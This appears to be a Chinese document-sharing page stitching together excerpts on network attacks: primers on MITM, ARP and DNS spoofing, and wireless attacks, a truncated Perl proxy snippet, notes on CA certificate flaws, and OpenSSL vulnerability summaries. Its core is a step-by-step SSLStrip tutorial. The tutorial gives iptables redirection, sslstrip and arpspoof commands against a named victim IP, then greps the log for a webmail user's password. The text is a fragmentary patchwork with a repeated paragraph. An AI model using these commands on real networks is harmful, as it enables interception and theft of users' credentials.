中间人攻击

合集下载

计算机网络攻防技术入门指南

计算机网络攻防技术入门指南

计算机网络攻防技术入门指南第一章:计算机网络和攻防概述1.1 计算机网络的概念和组成计算机网络是一个由多个计算机和其他设备互联而成的系统,可以共享资源和信息。

计算机网络包括硬件设备(如计算机、路由器、交换机等)和软件协议(如TCP/IP、HTTP等)。

1.2 网络攻击的类型和危害网络攻击的类型包括拒绝服务攻击、网络钓鱼、中间人攻击、网络蠕虫等,可能导致数据泄露、服务中断等问题。

1.3 网络防御的重要性和目标网络防御的重要性在于保护网络安全、确保数据的保密性、完整性和可用性。

主要目标包括防止未授权访问、阻止恶意代码传播和提高网络运行的安全性。

第二章:网络攻击技术2.1 拒绝服务(DOS)攻击DOS攻击目的在于使目标系统无法正常提供服务,通过洪水攻击、合理攻击等方式来消耗资源以达到拒绝服务的目的。

2.2 中间人攻击中间人攻击是指攻击者在通信过程中伪装成通信的一方,窃取重要信息或篡改数据的行为。

常见的中间人攻击方式有ARP欺骗、SSL剥离等。

2.3 木马和病毒攻击木马和病毒是恶意软件,它们可以在用户不知情的情况下进入系统并进行破坏或窃取信息。

第三章:网络防御技术3.1 防火墙防火墙可以监控网络流量并根据设定的规则对流量进行过滤,以保护内部网络不受未经授权的访问。

3.2 入侵检测和入侵防御系统入侵检测和入侵防御系统可以及时监测和响应网络中的入侵行为,并采取相应措施进行应对。

3.3 加密和身份认证技术加密技术可以保护数据的机密性,而身份认证技术可以确保用户的真实身份,防止未授权访问。

第四章:网络安全管理4.1 安全策略和政策安全策略和政策是组织制定的规范和指南,用于保护网络安全,如访问控制策略、密码策略等。

4.2 安全意识培训和教育安全意识培训和教育是提高用户对网络安全风险的认识和应对能力,减少人为因素对网络安全造成的影响。

4.3 安全事件响应和漏洞管理安全事件响应和漏洞管理是指对网络安全事件和漏洞进行及时响应和管理,以减少安全风险。

无线网络的攻击方法

无线网络的攻击方法

无线网络的攻击方法无线网络攻击是指对无线网络进行攻击,以获取未经授权的访问或破坏网络安全。

无线网络攻击方法种类繁多,具有隐蔽性、便利性和高效性的特点,可以对个人用户、企业或政府机构的无线网络进行攻击,造成不同程度的危害。

下面将介绍一些常见的无线网络攻击方法。

1. 信号干扰:信号干扰是一种常见的无线网络攻击方法,攻击者通过发送高功率的无线信号,干扰目标无线网络的信号,导致网络连接不稳定或中断,甚至影响网络性能。

这种攻击方式可以通过自制干扰设备或专业的无线干扰器来实施。

2. 伪造AP攻击:攻击者可以通过搭建伪造的无线访问点(AP)来欺骗用户连接到自己的网络,然后窃取用户的敏感信息,如用户名、密码等。

这种攻击方式对普通用户来说具有一定的隐蔽性,因为他们难以区分真正的AP和伪造的AP。

3. 中间人攻击:中间人攻击是指攻击者与受害者之间建立连接,并伪装成受害者与目标服务器进行通信,从而窃取通信内容或篡改数据。

在无线网络中,中间人攻击通常是通过监听受害者和AP之间的通信流量,实施数据篡改或监视用户行为。

4. 无线密码破解:攻击者可以使用密码破解工具对目标无线网络的加密算法进行破解,获取网络密码,然后获取网络访问权限。

常见的密码破解工具包括Aircrack-ng、Reaver等,这些工具可以利用暴力破解或利用无线网络协议中的漏洞进行攻击。

5. DOS攻击:DOS(拒绝服务)攻击是通过发送大量无效的数据包或请求,占用目标无线网络的带宽和资源,导致网络连接不稳定或中断。

这种攻击方式可以使目标网络无法正常运行,影响用户的正常使用。

6. 漏洞利用攻击:无线网络设备或无线路由器存在一些已知或未知的安全漏洞,攻击者可以通过利用这些漏洞对无线网络进行攻击。

这种攻击方式通常需要一定的技术水平,但一旦成功,可以对目标网络造成严重的危害。

在应对无线网络攻击时,用户和组织可以采取一些措施来提高网络安全性,如加强网络设备的安全设置、定期更新无线网络设备的固件和软件、使用加密协议和访问控制技术、监测和检测异常网络流量等。

内网劫持最简单的方法

内网劫持最简单的方法

内网劫持最简单的方法引言随着互联网的发展,人们的生活日益依赖网络。

我们越来越需要快速稳定的互联网连接,而内网劫持成为了一种对网络连接稳定性的威胁。

本文将介绍内网劫持的基本概念、原理以及最简单的方法,以增强人们对网络安全的认识和警惕。

什么是内网劫持?内网劫持是指黑客非法获取目标网络内的非授权用户身份,并以此为基础入侵目标网络并控制网络内的设备和信息流。

内网劫持不同于传统的外部攻击,它是在目标网络内部进行的,因此更为隐蔽和危险。

内网劫持的原理内网劫持主要基于以下原理:1. ARP欺骗:ARP(地址解析协议)是将MAC地址与IP地址相对应的协议。

黑客可以通过发送虚假的ARP响应将网络内的所有流量重定向到自己的计算机上,进而实现监控和控制目标设备。

2. DNS劫持:DNS(域名系统)用于将域名解析为IP地址。

黑客可以通过劫持DNS服务器的响应,将用户的域名解析请求重定向到恶意服务器上,进而接管目标设备的网络流量。

3. 中间人攻击:黑客可以在目标设备和目标服务器之间插入自己的计算机,作为中间人存在。

这样,黑客就可以截取目标设备与服务器之间的通信,并对数据进行修改或篡改。

内网劫持的实施方法内网劫持有许多复杂的技术手段,但其中最简单的方法包括以下几种:1. ARP欺骗攻击ARP欺骗攻击是一种常见的内网劫持方法。

黑客通过伪造ARP响应包,将目标设备的MAC地址与自己的MAC地址进行绑定。

这样在网络中,所有发往目标设备的数据包都将被重定向到黑客的计算机上。

黑客可以通过嗅探数据包、修改数据包内容或注入恶意代码来获取敏感信息或控制目标设备。

2. DNS劫持攻击DNS劫持攻击是一种利用DNS协议的漏洞进行的攻击。

黑客可以通过修改DNS服务器的响应,将用户请求的域名解析为恶意IP地址,使用户连接到一个恶意服务器上。

黑客可以在此恶意服务器上获取用户的敏感信息,或进一步控制目标设备。

3. 中间人攻击中间人攻击是通过在目标设备与服务器之间插入自己的计算机,来获取通信数据或干扰通信过程。

网络攻击事件的类型及特点有哪些

网络攻击事件的类型及特点有哪些

网络攻击事件的类型及特点有哪些在当今数字化的时代,网络已经成为我们生活和工作中不可或缺的一部分。

然而,伴随着网络的广泛应用,网络攻击事件也日益频繁,给个人、企业和国家带来了巨大的威胁。

网络攻击的类型多种多样,每种类型都有其独特的特点和危害方式。

一、网络攻击的类型(一)恶意软件攻击恶意软件是网络攻击中最常见的形式之一。

这包括病毒、蠕虫、特洛伊木马、间谍软件和广告软件等。

病毒通过自我复制来感染其他文件和系统,导致系统性能下降、数据损坏甚至系统崩溃。

蠕虫则能够在网络中自行传播,无需用户干预。

特洛伊木马看似正常的程序,但却隐藏着恶意功能,例如窃取用户的个人信息、控制用户的计算机等。

间谍软件通常在用户不知情的情况下收集用户的敏感信息,如浏览历史、密码等。

广告软件则会不断弹出广告,干扰用户的正常使用。

(二)网络钓鱼攻击网络钓鱼是一种通过欺诈性的电子邮件、短信或网站来诱骗用户提供个人敏感信息,如用户名、密码、信用卡号等的攻击方式。

攻击者常常伪装成合法的机构,如银行、电商平台等,以获取用户的信任。

一旦用户上当受骗,攻击者就可以利用这些信息进行欺诈活动,造成用户的财产损失。

(三)拒绝服务攻击(DoS 和 DDoS)拒绝服务攻击的目的是使目标系统或网络无法正常提供服务。

在DoS 攻击中,攻击者通常使用单个计算机向目标发送大量的请求,使其资源耗尽,无法处理合法用户的请求。

而 DDoS 攻击则更为强大,攻击者利用多个被控制的计算机(称为“僵尸网络”)同时向目标发起攻击,造成更严重的影响。

这种攻击会导致网站瘫痪、网络服务中断,给企业和用户带来极大的不便。

(四)SQL 注入攻击SQL 注入是针对数据库驱动的网站和应用程序的一种攻击方式。

攻击者通过在输入字段中插入恶意的 SQL 代码,从而获取、修改或删除数据库中的数据。

这可能导致用户数据泄露、网站功能异常甚至整个数据库系统崩溃。

(五)零日攻击零日攻击是指利用尚未被发现或未被修复的软件漏洞进行的攻击。

网络认证与访问控制的网络安全威胁分析(十)

网络认证与访问控制的网络安全威胁分析(十)

网络认证与访问控制是当今网络安全的重要组成部分,它们是保护网络不受非法入侵和网络攻击的关键措施。

然而,网络认证与访问控制也面临着各种网络安全威胁,本文将对这些威胁进行分析。

一、密码破解密码是网络认证与访问控制中最常见的认证方式之一。

然而,不安全的密码设置和管理容易导致密码被破解。

常见的密码破解手段包括暴力破解、字典攻击和社交工程等。

暴力破解是通过尝试所有可能的密码组合来找到正确的密码,而字典攻击是使用常用密码字典来尝试猜测密码。

此外,攻击者还可以利用社交工程手段获取用户的密码,比如通过伪造登录页面诱导用户输入密码。

二、身份伪造身份伪造是指攻击者冒充合法用户的身份进行非法访问。

常见的身份伪造手段包括IP地址欺骗、MAC地址欺骗和ARP欺骗等。

IP地址欺骗是指攻击者伪造自己的IP地址以获取合法用户的权限。

MAC地址欺骗是通过伪造网络设备的MAC地址,使其被误认为是合法设备。

ARP欺骗则是通过发送伪造的ARP响应包来欺骗网络设备。

三、中间人攻击中间人攻击是指攻击者在通信的过程中窃取或篡改通信内容。

这种攻击方式常见于公共Wi-Fi等不安全网络环境中。

攻击者可以通过欺骗用户将自己的设备当作网关,从而截取用户发送的数据。

另外,攻击者还可以将自己伪装成合法网站或服务器,截取用户的登录信息或篡改网页内容。

四、弱点利用网络认证与访问控制系统中可能存在漏洞或弱点,攻击者可以利用这些弱点进行攻击。

例如,某个认证系统可能存在未修补的安全漏洞,攻击者可以通过利用这个漏洞来获取不受限制的访问权限。

另外,设备配置错误也是常见的弱点,攻击者可以通过利用这些错误来绕过认证系统。

五、恶意软件恶意软件是网络安全威胁中最常见和危险的一种。

恶意软件可以通过感染计算机来获取用户的登录信息,绕过网络认证与访问控制系统。

常见的恶意软件包括病毒、蠕虫、木马和间谍软件等。

攻击者可以通过电子邮件附件、下载链接或恶意网站来传播恶意软件。

综上所述,网络认证与访问控制的网络安全威胁主要包括密码破解、身份伪造、中间人攻击、弱点利用和恶意软件等。

什么是MitM 攻击?如何预防?

什么是MitM 攻击?如何预防?

什么是MitM 攻击?如何预防?作者:作者 Dan Swinhoe 编译:Charles来源:《计算机世界》 2019年第11期利用中间人网络攻击,攻击者能够秘密地拦截通信或者改变通信。

虽然很难检测MitM 攻击,但却是可以预防的。

中间人(Man-in-the-Middle,MitM)攻击是指当双方进行通信时,攻击者拦截通信,秘密地窃听或者修改双方之间的数据流。

攻击者会使用MitM 攻击来窃取登录凭证和个人信息、窥探受害者、破坏通信,甚至损坏数据。

CrowdStrike 公司的EMEA 技术策略师ZekiTuredi 指出,“MitM 攻击是为达到目的而实施的战术手段。

其目的可能是监视个人或者团体,以转移人们的工作方向、资金、资源或者注意力。

”虽然可以通过加密措施来防御MitM,但成功的攻击者要么把数据流重新路由到设计为看起来合法的网络钓鱼网站,要么只是在收集或者记录后将数据流传送到其预定目的地,这意味着很难检测此类攻击。

中间人攻击的工作原理MitM 攻击是最古老的一种网络攻击形式。

20 世纪80 年代初以来,计算机科学家一直在寻找能够防止有威胁的犯罪分子篡改或者窃听通信的方法。

MitM 攻击包括位于通信双方连接之间的坐席,他们观察并控制数据流。

这可以通过干扰合法网络或者创建攻击者能够控制的假网络来实现。

然后,为了窃取、更改和重新路由这些数据流到攻击者所选择的目的地(例如,网络钓鱼登录网站),会对被攻破的这些数据流进行解密。

由于攻击者在记录或者编辑被截获的数据流后,只是静默地观察,或者重新加密这些数据流,将其传送到预定的目的地,因此很难发现这种攻击。

SANS 技术研究所的研究主任Johannes Ullrich 说:“MitM 攻击是攻击者实际上位于受害者和受害者想要连接的合法主机之间的一种攻击。

所以,他们要么被动地监听连接,要么实际上截获连接,终止连接,并建立到目的地的新连接。

”取决于目标和目的,MitM 包含了很多技术,会带来各种可能的结果。

SSL中间人攻击终结凶器---SSLStrip

SSL中间人攻击终结凶器---SSLStrip

的版本,该工具为 Python 语言编写,需要 Python 环境支持,故要先下载 Python
并安装。
三、SSLStrip 攻击实战操作(以破解用户 IP 为 192.168.1.33,用户账号为 test 的 126 邮箱的密码为例) 步骤 1: 使用 nmap 对内网中开启的机器进行扫描以确定攻击目标 nmap –sP 192.168.1.0/24 参数解释: -sP:启用 ICMP 探测,即 ping 扫描。 步骤 2: 将网卡模式改为转发模式 Echo “1” >/proc/sys/net/ipv4/ip_forward 步骤 3: 在 iptables 里添加规则,把所有 http 数据导入到 sslstrip 中
第2页
Iptables –t –A PREROUTING –p tcp –destination-port 80 –j REDIRECT --to-port 9527 或者 Iptables –t nat –A PREROUTING –p tcp –dport 80 –j REDIRECT --to-port 9527 参数解释: -t:制定命令要操作的匹配包的表 -A:在选择的链末添加规则 -p:制定协议 --destination-port 或--dport:制定目标端口 -j:目标跳转 步骤 4: 开启 SSLStrip Python ./sslstrip.py –a –l 9527 pojie.log 参数解释: -a:记录所有来自服务器的 SSL 及 HTTP 数据流量内容。 -l:监听的端口,应和前面在 iptables 里设置的一样。 -w:将拦截内容保存为文件。 步骤 5: 进行中间人攻击 arpspoof –i eth0 –t 192.168.1.33 192.168.1.1 参数解释: -i eth0:指定的工作网卡。

MITM实例

MITM实例
前言: 说起“中间人攻击(Man-in-the-middle-attacks, 简称: MITM 攻击)”大家可能马上想起曾经 风靡一时的 SMB 会话劫持,DNS 欺骗等技术, 这些都是典型的 MITM 攻击手段。 其实 MITM 攻击说它是一种手段,不如说它是一种攻击模式,它可以应用于各个领域,比如在现实中, A 通过 B 给 C 传话, 那么 B 在传话给 C 的时候, 可以夸大其词, 也可以填油加醋后传给 C, 在这个过程中中间人 B 无意中就来一次 MITM 攻击,其实“谣言”就是这么来的 J. 具体在 网络安全方面, MITM 攻击应用也很广泛, 下面我就以 http 协议代理来介绍下代理里 MITM 攻击。 一 .原理 代理服务的一个典型模型: <?data-> Web Server middle man 上 面可以看出:client 发出的请求 和 web server 返回的数据都经过 proxy server 转发,这 个 proxy server 就起到了一个 middle man 的作用,如果这个“中间人” 够黑,那么整个代理 过程的数据 都可以由这个“中间人”控制。 二.攻击类型 截取敏感数据 代码注射 ProXP worm 其他利用 三.实例说明 1. 截取敏感数据 首先我们编写一个“恶意的中间人” 代理程序: 以下是代码片段: =============================codz start=============================== #!/usr/bin/perl #proxy mid-man-atk Test script use strict; use URI; use IO::Socket; my $showOpenedSockets=1; my $server = IO::Socket::INET->new ( LocalPort => 8080, Type => SOCK_STREAM, Reuse => 1, client <<-data-> proxy server
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

SSL 中间人攻击 来源:本站转载 作者:佚名 时间:2012-08-21 19:04:11 免责声明: 本文旨在探讨 SSL 加密的安全问题,对于读者使用本文介绍的方法和工具 进行的一切行为不负任何责任。 一、什么是 SSL SSL 是 Secure Socket Layer 的简称,中文意思是安全套接字层,由 NetScape 公司所开发,用以保障在 Internet 上数据传输的安全,确保数据在网络的传输 过程中不会被截取和窃听。 目前比较流行的版本为 SSL3.0,它已被广泛地用于 Web 浏览器与服务器之 间的身份认证和加密数据传输。 SSL 协议提供的服务主要有: (1)认证用户和服务器,确保数据发送到正确的客户和服务器。 (2)加密数据以防止数据中途被窃取。 (3)维护数据的完整性,确保数据在传输过程中不被改变。

二、关于 SSLStrip SSLStrip 的工作原理及步骤如下: (1) 先进行中间人攻击来拦截 HTTP 流量。 (2) 将出现的 HTTPS 链接全部替换为 HTTP,同时记下所有改变的链接。 (3) 使用 HTTP 与受害者机器连接。 (4) 同时与合法的服务器建立 HTTPS。 (5) 受害者与合法服务器之间的全部通信经过了代理转发。 (6) 其中,出现的图标被替换成为用户熟悉的“小黄锁”图标,以建立信 任。 (7) 这样,中间人攻击就成功骗取了密码、账号等信息,而受害者一无所 知。 SSLStrip 的 官 方 下 载 地 址 为 : http://www.thoughtcrime.org/software/sslstrip/,目前仅提供 Linux 系统下 的版本,该工具为 Python 语言编写,需要 Python 环境支持,故要先下载 Python 并安装。 三、SSLStrip 攻击实战操作(以破解用户 IP 为 192.168.1.33,用户账号为 test 的 126 邮箱的密码为例) 步骤 1: 使用 nmap 对内网中开启的机器进行扫描以确定攻击目标 nmap –sP 192.168.1.0/24 参数解释: -sP:启用 ICMP 探测,即 ping 扫描。 步骤 2: 将网卡模式改为转发模式 Echo “1” >/proc/sys/net/ipv4/ip_forward 步骤 3: 在 iptables 里添加规则,把所有 http 数据导入到 sslstrip 中 Iptables –t –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 9527 或者 Iptables –t nat –A PREROUTING –p tcp –dport 80 –j REDIRECT –to-port 9527 参数解释: -t:制定命令要操作的匹配包的表 -A:在选择的链末添加规则 -p:制定协议 –destination-port 或–dport:制定目标端口 -j:目标跳转 步骤 4: 开启 SSLStrip Python ./sslstrip.py –a –l 9527 pojie.log 参数解释: -a:记录所有来自服务器的 SSL 及 HTTP 数据流量内容。 -l:监听的端口,应和前面在 iptables 里设置的一样。 -w:将拦截内容保存为文件。 步骤 5: 进行中间人攻击 arpspoof –i eth0 –t 192.168.1.33 192.168.1.1 参数解释: -i eth0:指定的工作网卡。 -t:制定要进行欺骗的目标 IP 及网关 IP。 步骤 6: 查看 SSLStrip 生成的 pojie.log 文件里关于账户的信息 Cat pojie.log | grep test 从 pojie.log 文件中去找含有账户 test 字符的内容,从而找出用户 test 的密 码。

SSL的窃听和安全最近颇受关注,吴洪声提出了一种SSL窃听攻击的思路,主要是利用了CA签发证书的一个重大缺陷:只验证目标网站的域名信箱即可签发该网站的证书,因此,只要搞到目标网站的一个信箱,就可以窃取到这个域名的SSL证书。

因此,大多数免费邮箱或公司邮箱的SSL证书都存在网站SSL证书被窃取的可能性,Gmail由于使用mail.google.com而不是www.gmail.com,因此得以幸免于难。然而,有权使用google.com的Google公司的员工依然有可能获取google.com的SSL证书,一旦该证书被用于大规模的域名劫持,后果不堪设想。

如果想要避免这种SSL证书窃取,CA需要修改目前的签发流程,即在签发前需要验证申请者对于该网站具有管理权限,例如,在网站的首页增加一小段隐藏代码,或者在网站上传一个指定的HTML文件,这样,只有真正的网站拥有者才能做这样的操作,非法窃取者即使有了该域名的邮件,也无法获取该域名的证书。

当然,从根本上讲,这个攻击并非对SSL安全协议本身的攻击,只是对其发行机构的攻击,SSL协议目前来说还是安全可靠的。

名词注释:SSL 安全套接字层(Secure Sockets Layer,SSL)是一套提供身份验证、保密性和数据完整性的加密技术。SSL 最常用来在 Web 浏览器和 Web 服务器之间建立安全通信通道,用以保障在 Internet 上数据传输之安全,SSL 利用数据加密技术,确保数据在网络上之传输过程中不会被截取及窃听,它也可以在客户端应用程序和 Web 服务之间使用。

在Secure Sockets Layer (SSL) 以及 Transport Layer Security (TLS)协议中发现了一些漏洞。漏洞主要发生在 Abstract Syntax Notation One (ASN.1) 解译码 (parsing code)。一般的情况下会造成DoS攻击,最严重的情况能使远程攻击者执行任意程序代码。

SSL及TLS被用来提供验证、加密、以及较高层的网络应用程序譬如:HTTP的整合服务。某些被通讯协议,例如X.509凭证,使用的加密组件是以 ASN.1 对象来实现。为了加密以及解密这些对象,许多SSL以及TSL功能(包括加密函数库)都会包含 ASN.1 解析器(parsers)。

OpenSSL是一套被广为利用的,开放原代码的SSL及TLS程序。OpenSSL也提供一般用途的加密函数库,包含了一个ASN.1解析器。任何应用程序使用OpenSSL ASN1 函数库去解析不被信任的数据,包括所有 SSL 以及 TLS 应用程序,采用 S/MIME (PKCS#7) 或凭证产生函数。攻击者通过发送精心构造的client认证讯息到 server 端,或者尝试让一个client端在攻击者的控制之下跟 server 端进行连结。当 client 端建立连结之后,攻击者可以传递进行构造的认证讯息(注:只有 server 端要求取得 client 的认证,client才可以传递认证信息。SSL/TLS 服务器忽略主动提供的client 认证讯息能降低受攻击的风险)。OpenSSL中存在下列安全漏洞:

1、OpenSSL ASN.1解译器对于释放内存配置的安全性不足: OpenSSL释放内存的方式存在缺陷,这些内存原本是用于存放ASN.1结构的,这会让远程攻击者能以OpenSSL函数库执行者的权限来执行恶意程序代码。 2、OpenSSL在处理 ASN.1 tags 时存在两个整数溢出缺陷: OpenSSL在处理 ASN.1 tags 时存在两个整数溢出缺陷,能使远程攻击者向目标服务器发动拒绝服务攻击。

3、当OpenSSL设定为忽略错误时,不能够安全的处理无效公钥: OpenSSL在处理client 端认证信息中无效的公钥时,可以让远程攻击者导致拒绝服务攻击。利用这个漏洞需要设定为忽略公钥译码错误,在缺省配置的情况下,该漏洞不能被利用。

4、OpenSSL接受主动提供的 client 端认证讯息: OpenSSL接受主动提供的 client 端认证信息,可以允许攻击者去攻击潜藏在client端认证处理上的安全缺陷,譬如上面所述的缺陷。

5、多种SSL/TLS 协议程序含有多个安全缺陷: 在不同厂商的 SSL/TLS 协议程序中存有许多安全缺陷,这些缺陷所造成的影响包括在远程执行任意程序代码、拒绝服务攻击、以及泄漏机密信息等。

这些漏洞会造成的不同的影响。不过远程攻击者几乎都可以导致阻断服务攻击,而至少一个OpenSSL漏洞能使攻击者执行任意程序代码。

SSL的窃听和安全最近颇受关注,吴洪声提出了一种SSL窃听攻击的思路,主要是利用了CA签发证书的一个重大缺陷:只验证目标网站的域名信箱即可签发该网站的证书,因此,只要搞到目标网站的一个信箱,就可以窃取到这个域名的SSL证书。 因此,大多数免费邮箱或公司邮箱的SSL证书都存在网站SSL证书被窃取的可能性,Gmail由于使用mail.google.com而不是www.gmail.com,因此得以幸免于难。然而,有权使用google.com的Google公司的员工依然有可能获取google.com的SSL证书,一旦该证书被用于大规模的域名劫持,后果不堪设想。 如果想要避免这种SSL证书窃取,CA需要修改目前的签发流程,即在签发前需要验证申请者对于该网站具有管理权限,例如,在网站的首页增加一小段隐藏代码,或者在网站上传一个指定的HTML文件,这样,只有真正的网站拥有者才能做这样的操作,非法窃取者即使有了该域名的邮件,也无法获取该域名的证书。 当然,从根本上讲,这个攻击并非对SSL安全协议本身的攻击,只是对其发行机构的攻击,SSL协议目前来说还是安全可靠的。评论《解决SSL攻击的方法》的内容...相关文章:微软免费杀毒软件Microsoft Security Essentials智能卡操作系统COS概述中国是网络木马病毒犯罪的天堂思科企业网络安全配置十个常用网络密码的安全保护措施关于我们:我的Google Reader - 我的Twitter - 我的Facebook - 月光博客Twitter - 月光博客Facebook - 我的开心月光博客投稿信箱:williamlong.info(at)gmail.com

相关文档
最新文档